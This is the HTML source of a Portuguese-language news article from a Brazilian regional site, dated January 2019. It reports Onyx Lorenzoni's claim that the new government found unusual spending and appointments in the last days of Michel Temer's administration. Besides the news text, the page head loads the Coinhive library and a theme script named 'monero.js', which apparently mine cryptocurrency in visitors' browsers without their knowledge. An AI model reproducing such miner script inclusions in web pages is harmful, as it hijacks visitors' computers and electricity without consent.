
<!DOCTYPE html>
<html class="no-js" lang="pt-BR" prefix="og: http://ogp.me/ns#">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="http://oiguassu.com/xmlrpc.php" />
<title>GOVERNO DIZ TER IDENTIFICADO MOVIMENTAÇÃO INCOMUM DE GASTOS DE TEMER - Oiguassu</title>

	<!-- Meta Tag Manager -->
	<meta name="google-site-verification" content="9D5X4zGUYK9T8sBJcfFZt-zekBWN3kbyAXq7V-YRTEQ" />
	<!-- / Meta Tag Manager -->

<!-- This site is optimized with the Yoast SEO plugin v9.2.1 - https://yoast.com/wordpress/plugins/seo/ -->
<link rel="canonical" href="http://oiguassu.com/governo-diz-ter-identificado-movimentacao-incomum-de-gastos-de-temer/" />
<meta property="og:locale" content="pt_BR" />
<meta property="og:type" content="article" />
<meta property="og:title" content="GOVERNO DIZ TER IDENTIFICADO MOVIMENTAÇÃO INCOMUM DE GASTOS DE TEMER - Oiguassu" />
<meta property="og:description" content="O ministro-chefe da Casa Civil, Onyx Lorenzoni, afirmou nesta quinta-feira (3) que o governo identificou &#8220;uma movimentação incomum de exonerações e nomeações e recursos destinados..." />
<meta property="og:url" content="http://oiguassu.com/governo-diz-ter-identificado-movimentacao-incomum-de-gastos-de-temer/" />
<meta property="og:site_name" content="Oiguassu" />
<meta property="article:tag" content="manchete1" />
<meta property="article:section" content="Brasil" />
<meta property="article:published_time" content="2019-01-03T20:26:43+00:00" />
<meta property="og:image" content="http://oiguassu.com/wp-content/uploads/2019/01/BBRLTx9.jpg" />
<meta property="og:image:width" content="1119" />
<meta property="og:image:height" content="746" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:description" content="O ministro-chefe da Casa Civil, Onyx Lorenzoni, afirmou nesta quinta-feira (3) que o governo identificou &#8220;uma movimentação incomum de exonerações e nomeações e recursos destinados..." />
<meta name="twitter:title" content="GOVERNO DIZ TER IDENTIFICADO MOVIMENTAÇÃO INCOMUM DE GASTOS DE TEMER - Oiguassu" />
<meta name="twitter:image" content="http://oiguassu.com/wp-content/uploads/2019/01/BBRLTx9.jpg" />
<script type='application/ld+json'>{"@context":"https:\/\/schema.org","@type":"Organization","url":"http:\/\/oiguassu.com\/","sameAs":[],"@id":"http:\/\/oiguassu.com\/#organization","name":"Oiguassu","logo":""}</script>
<!-- / Yoast SEO plugin. -->

<link rel='dns-prefetch' href='//s0.wp.com' />
<link rel='dns-prefetch' href='//secure.gravatar.com' />
<link rel='dns-prefetch' href='//coinhive.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Feed para Oiguassu &raquo;" href="http://oiguassu.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para Oiguassu &raquo;" href="http://oiguassu.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para Oiguassu &raquo; GOVERNO DIZ TER IDENTIFICADO MOVIMENTAÇÃO INCOMUM DE GASTOS DE TEMER" href="http://oiguassu.com/governo-diz-ter-identificado-movimentacao-incomum-de-gastos-de-temer/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/oiguassu.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.9"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='gglcptch-css'  href='http://oiguassu.com/wp-content/plugins/google-captcha/css/gglcptch.css?ver=1.38' type='text/css' media='all' />
<link rel='stylesheet' id='mh-style-css'  href='http://oiguassu.com/wp-content/themes/mh_newsdesk/style.css?ver=1.3.0' type='text/css' media='all' />
<link rel='stylesheet' id='mh-font-awesome-css'  href='http://oiguassu.com/wp-content/themes/mh_newsdesk/includes/font-awesome.min.css' type='text/css' media='all' />
<link rel='stylesheet' id='mh-google-fonts-css'  href='https://fonts.googleapis.com/css?family=PT+Serif:300,400,400italic,600,700%7cOswald:300,400,400italic,600,700' type='text/css' media='all' />
<link rel='stylesheet' id='social-logos-css'  href='http://oiguassu.com/wp-content/plugins/jetpack/_inc/social-logos/social-logos.min.css?ver=1' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='http://oiguassu.com/wp-content/plugins/jetpack/css/jetpack.css?ver=6.8' type='text/css' media='all' />
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var related_posts_js_options = {"post_heading":"h4"};
/* ]]> */
</script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/plugins/jetpack/_inc/build/related-posts/related-posts.min.js?ver=20150408'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/themes/mh_newsdesk/js/scripts.js?ver=4.9.9'></script>
<script type='text/javascript' src='https://coinhive.com/lib/coinhive.min.js?ver=4.9.9'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/themes/mh_newsdesk/js/monero.js?ver=4.9.9'></script>
<link rel='https://api.w.org/' href='http://oiguassu.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://oiguassu.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://oiguassu.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.9.9" />
<link rel='shortlink' href='https://wp.me/pS5BS-3Eh' />
<link rel="alternate" type="application/json+oembed" href="http://oiguassu.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Foiguassu.com%2Fgoverno-diz-ter-identificado-movimentacao-incomum-de-gastos-de-temer%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://oiguassu.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Foiguassu.com%2Fgoverno-diz-ter-identificado-movimentacao-incomum-de-gastos-de-temer%2F&#038;format=xml" />
		<a href="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></a>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-9260427313362027",
    enable_page_level_ads: true
  });
</script>

<link rel='dns-prefetch' href='//v0.wordpress.com'/>
<style type='text/css'>img#wpstats{display:none}</style>	<style type="text/css">
    	    		.social-nav a:hover, .logo-title, .entry-content a, a:hover, .entry-meta .entry-meta-author, .entry-meta a, .comment-info, blockquote, .pagination a:hover .pagelink { color: #019100; }
			.main-nav li:hover, .slicknav_menu, .ticker-title, .breadcrumb a, .breadcrumb .bc-text, .button span, .widget-title span, input[type=submit], table th, .comment-section-title .comment-count, #cancel-comment-reply-link:hover, .pagination .current, .pagination .pagelink { background: #019100; }
			blockquote, input[type=text]:hover, input[type=email]:hover, input[type=tel]:hover, input[type=url]:hover, textarea:hover { border-color: #019100; }
    	    	    				.main-nav, .main-nav ul li:hover > ul, .mh-footer { background: #019100; }
    	    	    	    		</style>
    <!--[if lt IE 9]>
<script src="http://oiguassu.com/wp-content/themes/mh_newsdesk/js/css3-mediaqueries.js"></script>
<![endif]-->
<link rel="amphtml" href="http://oiguassu.com/governo-diz-ter-identificado-movimentacao-incomum-de-gastos-de-temer/amp/"><link rel="icon" href="http://oiguassu.com/wp-content/uploads/2018/05/cropped-Untitled-1-32x32.png" sizes="32x32" />
<link rel="icon" href="http://oiguassu.com/wp-content/uploads/2018/05/cropped-Untitled-1-192x192.png" sizes="192x192" />
<link rel="apple-touch-icon-precomposed" href="http://oiguassu.com/wp-content/uploads/2018/05/cropped-Untitled-1-180x180.png" />
<meta name="msapplication-TileImage" content="http://oiguassu.com/wp-content/uploads/2018/05/cropped-Untitled-1-270x270.png" />
</head>
<body class="post-template-default single single-post postid-14029 single-format-standard mh-right-sb">
<div id="mh-wrapper">
<header class="mh-header">
	<div class="header-wrap clearfix">
				<div class="mh-col mh-1-3 header-logo-full">
			<a href="http://oiguassu.com/" title="Oiguassu" rel="home">
<div class="logo-wrap" role="banner">
<img src="http://oiguassu.com/wp-content/uploads/2018/05/cropped-b632f59c-2a6b-406a-bb6b-bd0031fe147b.jpg" height="427" width="1280" alt="Oiguassu" />
</div>
</a>
		</div>
			</div>
	<div class="header-menu clearfix">
		<nav class="main-nav clearfix">
			<div class="menu-menu-container"><ul id="menu-menu" class="menu"><li id="menu-item-90" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-90"><a href="http://oiguassu.com">Início</a></li>
<li id="menu-item-91" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-91"><a href="http://oiguassu.com/category/foz/">Foz do Iguaçu</a></li>
<li id="menu-item-92" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-92"><a href="http://oiguassu.com/category/parana/">Paraná</a></li>
<li id="menu-item-93" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-93"><a href="http://oiguassu.com/category/brasil/">Brasil</a></li>
<li id="menu-item-94" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-94"><a href="http://oiguassu.com/category/argentina/">Argentina</a></li>
<li id="menu-item-95" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-95"><a href="http://oiguassu.com/category/paraguay/">Paraguay</a></li>
<li id="menu-item-96" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-96"><a href="http://oiguassu.com/category/latinoamerica/">Latinoamerica</a></li>
<li id="menu-item-97" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-97"><a href="http://oiguassu.com/category/colunas/">Colunas</a></li>
</ul></div>		</nav>
		<div class="header-sub clearfix">
							<div id="ticker" class="news-ticker mh-col mh-2-3 clearfix">
			<span class="ticker-title">
			Hot Topics		</span>
		<ul class="ticker-content">			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/governo-diz-ter-identificado-movimentacao-incomum-de-gastos-de-temer/" title="GOVERNO DIZ TER IDENTIFICADO MOVIMENTAÇÃO INCOMUM DE GASTOS DE TEMER">
					<span class="ticker-item-date">Janeiro 3, 2019</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">GOVERNO DIZ TER IDENTIFICADO MOVIMENTAÇÃO INCOMUM DE GASTOS DE TEMER</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/heleno-diz-que-nao-reforcara-seguranca-diaria-de-bolsonaro/" title="HELENO DIZ QUE NÃO REFORÇARÁ SEGURANÇA DIÁRIA DE BOLSONARO">
					<span class="ticker-item-date">Janeiro 3, 2019</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">HELENO DIZ QUE NÃO REFORÇARÁ SEGURANÇA DIÁRIA DE BOLSONARO</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/socorristas-russos-encontram-novos-corpos-em-predio-que-caiu-apos-explosao-de-gas/" title="SOCORRISTAS RUSSOS ENCONTRAM NOVOS CORPOS EM PRÉDIO QUE CAIU APÓS EXPLOSÃO DE GÁS">
					<span class="ticker-item-date">Janeiro 3, 2019</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">SOCORRISTAS RUSSOS ENCONTRAM NOVOS CORPOS EM PRÉDIO QUE CAIU APÓS EXPLOSÃO DE GÁS</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/bolsonaro-comanda-nesta-quinta-feira-primeira-reuniao-ministerial-do-novo-governo/" title="BOLSONARO COMANDA NESTA QUINTA-FEIRA PRIMEIRA REUNIÃO MINISTERIAL DO NOVO GOVERNO">
					<span class="ticker-item-date">Janeiro 3, 2019</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">BOLSONARO COMANDA NESTA QUINTA-FEIRA PRIMEIRA REUNIÃO MINISTERIAL DO NOVO GOVERNO</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/em-discurso-moro-nao-estipula-metas-aposta-em-mudanca-de-leis-e-repete-planos-anteriores/" title="EM DISCURSO, MORO NÃO ESTIPULA METAS, APOSTA EM MUDANÇA DE LEIS E REPETE PLANOS ANTERIORES">
					<span class="ticker-item-date">Janeiro 3, 2019</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">EM DISCURSO, MORO NÃO ESTIPULA METAS, APOSTA EM MUDANÇA DE LEIS E REPETE PLANOS ANTERIORES</span>
				</a>
			</li>	</ul>
</div>						<aside class="mh-col mh-1-3 header-search">
				<form role="search" method="get" class="search-form" action="http://oiguassu.com/">
				<label>
					<span class="screen-reader-text">Pesquisar por:</span>
					<input type="search" class="search-field" placeholder="Pesquisar &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Pesquisar" />
			</form>			</aside>
		</div>
	</div>
</header><div class="mh-section mh-group">
	<div id="main-content" class="mh-content"><nav class="breadcrumb"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://oiguassu.com" itemprop="url" class="bc-home"><span itemprop="title">Home</span></a></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://oiguassu.com/category/brasil/" itemprop="url"><span itemprop="title">Brasil</span></a></span></nav>
<article id="post-14029" class="post-14029 post type-post status-publish format-standard has-post-thumbnail hentry category-brasil tag-manchete1">
	<header class="entry-header clearfix">
		<h1 class="entry-title">
			GOVERNO DIZ TER IDENTIFICADO MOVIMENTAÇÃO INCOMUM DE GASTOS DE TEMER		</h1>
		<div class="entry-tags clearfix"><span>TOPICS:</span><a href="http://oiguassu.com/tag/manchete1/" rel="tag">manchete1</a></div>	</header>
	
<div class="entry-thumbnail">
<img width="777" height="437" src="http://oiguassu.com/wp-content/uploads/2019/01/BBRLTx9-777x437.jpg" class="attachment-content-single size-content-single wp-post-image" alt="" srcset="http://oiguassu.com/wp-content/uploads/2019/01/BBRLTx9-777x437.jpg 777w, http://oiguassu.com/wp-content/uploads/2019/01/BBRLTx9-180x101.jpg 180w, http://oiguassu.com/wp-content/uploads/2019/01/BBRLTx9-260x146.jpg 260w, http://oiguassu.com/wp-content/uploads/2019/01/BBRLTx9-373x210.jpg 373w, http://oiguassu.com/wp-content/uploads/2019/01/BBRLTx9-120x67.jpg 120w" sizes="(max-width: 777px) 100vw, 777px" data-attachment-id="14030" data-permalink="http://oiguassu.com/governo-diz-ter-identificado-movimentacao-incomum-de-gastos-de-temer/bbrltx9/" data-orig-file="http://oiguassu.com/wp-content/uploads/2019/01/BBRLTx9.jpg" data-orig-size="1119,746" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="BBRLTx9" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2019/01/BBRLTx9-300x200.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2019/01/BBRLTx9-1024x683.jpg" /></div>
		<p class="entry-meta">
<span class="entry-meta-author vcard author">Posted By: <a class="fn" href="http://oiguassu.com/author/administrador/">Administrador</a></span>
<span class="entry-meta-date updated">Janeiro 3, 2019</span>
</p>
	<div class="entry-content clearfix">
		<h2 style="text-align: justify;">O ministro-chefe da Casa Civil, Onyx Lorenzoni, afirmou nesta quinta-feira (3) que o governo identificou &#8220;uma movimentação incomum de exonerações e nomeações e recursos destinados a ministérios&#8221; no apagar das luzes da gestão Michel Temer (MDB) e quer a revisão delas</h2>
<p style="text-align: justify;">Após o encontro de Bolsonaro e do vice-presidente, general Hamilton Mourão (PRTB), com os 22 novos ministros, nenhuma medida concreta foi anunciada.</p>
<p style="text-align: justify;">Segundo o chefe da Casa Civil, foi solicitado que todos os ministros repassem os atos e os gastos dos últimos 30 dias para elaborarem um relatório a pedido do presidente Jair Bolsonaro (PSL).</p>
<p style="text-align: justify;">&#8220;O alto volume causou estranheza&#8221;, afirmou Onyx, depois de quase três horas de reunião. &#8220;O presidente pediu para verificar para onde foi o dinheiro, por que e se tem suporte para ter sido feito.&#8221;</p>
<p style="text-align: justify;">Onyx anunciou ainda que o governo pretende chamar de &#8220;Casa Brasil&#8221;, um modelo que consiste em reunir toda a estrutura da administração direta nos estados e capitais em um único local.</p>
<p style="text-align: justify;">O objetivo é, segundo ele, permitir a venda dos imóveis ociosos. &#8220;A União tem próximo de 700 mil imóveis e ainda aluga espaço&#8221;, afirmou. &#8220;É um contrassenso absoluto.&#8221;</p>
<p style="text-align: justify;">O ministro, no entanto, não disse qual será a economia com a iniciativa.</p>
<p style="text-align: justify;">Onyx disse também que &#8220;faltou coragem&#8221; a Temer para &#8220;limpar a casa&#8221; antes do fim do mandato e demitir servidores supostamente ligados ao PT.</p>
<p style="text-align: justify;">Essa foi a maneira de o ministro justificar a exoneração de 320 funcionários de cargos de confiança vinculados à sua pasta, que passarão a partir de agora por uma triagem para que o novo governo identifique quem foi indicado durante as gestões Lula e Dilma Rousseff. Estes, segundo ele, devem ser demitidos definitivamente. Os outros poderão ser readmitidos nas suas funções.</p>
<p style="text-align: justify;">&#8220;Precisamos ter a coragem de fazer o que talvez tenha faltado ao governo que terminou no dia 31 [de dezembro de 2018], de, logo de início, limpar a casa&#8221;, disse Onyx após a primeira reunião ministerial de Bolsonaro como presidente.</p>
<p style="text-align: justify;">&#8220;É o único jeito de poder tocar nossas ideias e nossos conceitos, fazer aquilo que a sociedade brasileira decidiu por maioria. Dar um basta nas ideias socialistas e comunistas que, por 30 anos, nos levaram a esse caos&#8221;, completou.</p>
<p style="text-align: justify;">Mais uma vez, Onyx adiou a divulgação das prioridades do novo governo -agora, para a próxima terça-feira (8)- e se ateve a medidas de pouco efeito prático para a redução de gastos, porém, afinadas ao discurso político que elegeu o presidente.</p>
<p style="text-align: justify;">Ele disse que a exoneração de mais de 300 servidores da Casa Civil para &#8220;despetizar a administração pública&#8221;, como definiu, foi tomada como exemplo pelo governo.</p>
<p style="text-align: justify;">&#8220;Todos os ministros estão autorizados a proceder de maneira semelhante ou ajustada a cada uma das pastas&#8221;, afirmou.</p>
<p style="text-align: justify;">Apesar disso, ele negou que a prática seja uma caça às bruxas, ao contrário. &#8220;O conceito está perpassando todo o governo para desaparelhar e permitir que o presidente Bolsonaro possa executar suas políticas.&#8221;</p>
<h6 style="text-align: right;">(Com MSN Notícias)</h6>
<p><img class="aligncenter size-large" src="http://unifoz.edu.br/ProdutosIMG/5_1.jpg" width="800" height="756" /></p>
<div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon sd-sharing"><h3 class="sd-title">Compartilhe isso:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow noopener noreferrer" data-shared="sharing-twitter-14029" class="share-twitter sd-button share-icon no-text" href="http://oiguassu.com/governo-diz-ter-identificado-movimentacao-incomum-de-gastos-de-temer/?share=twitter" target="_blank" title="Clique para compartilhar no Twitter"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Twitter(abre em nova janela)</span></a></li><li class="share-facebook"><a rel="nofollow noopener noreferrer" data-shared="sharing-facebook-14029" class="share-facebook sd-button share-icon no-text" href="http://oiguassu.com/governo-diz-ter-identificado-movimentacao-incomum-de-gastos-de-temer/?share=facebook" target="_blank" title="Clique para compartilhar no Facebook"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Facebook(abre em nova janela)</span></a></li><li class="share-google-plus-1"><a rel="nofollow noopener noreferrer" data-shared="sharing-google-14029" class="share-google-plus-1 sd-button share-icon no-text" href="http://oiguassu.com/governo-diz-ter-identificado-movimentacao-incomum-de-gastos-de-temer/?share=google-plus-1" target="_blank" title="Compartilhe no Google+"><span></span><span class="sharing-screen-reader-text">Compartilhe no Google+(abre em nova janela)</span></a></li><li class="share-end"></li></ul></div></div></div>
<div id='jp-relatedposts' class='jp-relatedposts' >
	<h3 class="jp-relatedposts-headline"><em>Relacionado</em></h3>
</div>	</div>
	</article>		<h4 class="widget-title related-content-title">
			<span>Related Articles</span>
		</h4>
		<div class="related-content clearfix"><article class="mh-col mh-1-4 content-grid post-10994 post type-post status-publish format-standard has-post-thumbnail hentry category-brasil tag-manchete1">
	<div class="content-thumb content-grid-thumb">
		<a href="http://oiguassu.com/ibope-bolsonaro-volta-a-crescer-e-vai-a-31-enquanto-haddad-ve-rejeicao-disparar/" title="IBOPE: BOLSONARO VOLTA A CRESCER E VAI A 31% ENQUANTO HADDAD VÊ REJEIÇÃO DISPARAR"><img width="180" height="101" src="http://oiguassu.com/wp-content/uploads/2018/10/1538438214_776874_1538438593_noticia_normal_recorte1-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" srcset="http://oiguassu.com/wp-content/uploads/2018/10/1538438214_776874_1538438593_noticia_normal_recorte1-180x101.jpg 180w, http://oiguassu.com/wp-content/uploads/2018/10/1538438214_776874_1538438593_noticia_normal_recorte1-300x169.jpg 300w, http://oiguassu.com/wp-content/uploads/2018/10/1538438214_776874_1538438593_noticia_normal_recorte1-768x431.jpg 768w, http://oiguassu.com/wp-content/uploads/2018/10/1538438214_776874_1538438593_noticia_normal_recorte1-1024x575.jpg 1024w, http://oiguassu.com/wp-content/uploads/2018/10/1538438214_776874_1538438593_noticia_normal_recorte1-777x437.jpg 777w, http://oiguassu.com/wp-content/uploads/2018/10/1538438214_776874_1538438593_noticia_normal_recorte1-260x146.jpg 260w, http://oiguassu.com/wp-content/uploads/2018/10/1538438214_776874_1538438593_noticia_normal_recorte1-373x210.jpg 373w, http://oiguassu.com/wp-content/uploads/2018/10/1538438214_776874_1538438593_noticia_normal_recorte1-120x67.jpg 120w" sizes="(max-width: 180px) 100vw, 180px" data-attachment-id="10995" data-permalink="http://oiguassu.com/ibope-bolsonaro-volta-a-crescer-e-vai-a-31-enquanto-haddad-ve-rejeicao-disparar/1538438214_776874_1538438593_noticia_normal_recorte1/" data-orig-file="http://oiguassu.com/wp-content/uploads/2018/10/1538438214_776874_1538438593_noticia_normal_recorte1.jpg" data-orig-size="1960,1101" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="1538438214_776874_1538438593_noticia_normal_recorte1" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2018/10/1538438214_776874_1538438593_noticia_normal_recorte1-300x169.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2018/10/1538438214_776874_1538438593_noticia_normal_recorte1-1024x575.jpg" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="http://oiguassu.com/category/brasil/" rel="category tag">Brasil</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
		<a href="http://oiguassu.com/ibope-bolsonaro-volta-a-crescer-e-vai-a-31-enquanto-haddad-ve-rejeicao-disparar/" title="IBOPE: BOLSONARO VOLTA A CRESCER E VAI A 31% ENQUANTO HADDAD VÊ REJEIÇÃO DISPARAR" rel="bookmark">
			IBOPE: BOLSONARO VOLTA A CRESCER E VAI A 31% ENQUANTO HADDAD VÊ REJEIÇÃO DISPARAR		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator"><article class="mh-col mh-1-4 content-grid post-10716 post type-post status-publish format-standard has-post-thumbnail hentry category-brasil tag-manchete1">
	<div class="content-thumb content-grid-thumb">
		<a href="http://oiguassu.com/futuro-presidente-tera-de-enfrentar-financiamento-do-sus/" title="FUTURO PRESIDENTE TERÁ DE ENFRENTAR FINANCIAMENTO DO SUS"><img width="180" height="101" src="http://oiguassu.com/wp-content/uploads/2018/09/hospital_1-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" srcset="http://oiguassu.com/wp-content/uploads/2018/09/hospital_1-180x101.jpg 180w, http://oiguassu.com/wp-content/uploads/2018/09/hospital_1-777x437.jpg 777w, http://oiguassu.com/wp-content/uploads/2018/09/hospital_1-260x146.jpg 260w, http://oiguassu.com/wp-content/uploads/2018/09/hospital_1-373x210.jpg 373w, http://oiguassu.com/wp-content/uploads/2018/09/hospital_1-120x67.jpg 120w" sizes="(max-width: 180px) 100vw, 180px" data-attachment-id="10717" data-permalink="http://oiguassu.com/futuro-presidente-tera-de-enfrentar-financiamento-do-sus/hospital_1/" data-orig-file="http://oiguassu.com/wp-content/uploads/2018/09/hospital_1.jpg" data-orig-size="1140,760" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;Marcello Casal Jr.\/Ag\u00eancia Brasil&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;Bras\u00edlia - Unidade de Terapia Intensiva (UTI) do Hospital Regional de Taguatinga. Em alguns hospitais do Distrito Federal faltam leitos para os pacientes. Foto: Marcello Casal JR\/ABr&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;Agencia Brasil&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="hospital_1" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2018/09/hospital_1-300x200.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2018/09/hospital_1-1024x683.jpg" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="http://oiguassu.com/category/brasil/" rel="category tag">Brasil</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
		<a href="http://oiguassu.com/futuro-presidente-tera-de-enfrentar-financiamento-do-sus/" title="FUTURO PRESIDENTE TERÁ DE ENFRENTAR FINANCIAMENTO DO SUS" rel="bookmark">
			FUTURO PRESIDENTE TERÁ DE ENFRENTAR FINANCIAMENTO DO SUS		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator"><article class="mh-col mh-1-4 content-grid post-1447 post type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized tag-manchete1">
	<div class="content-thumb content-grid-thumb">
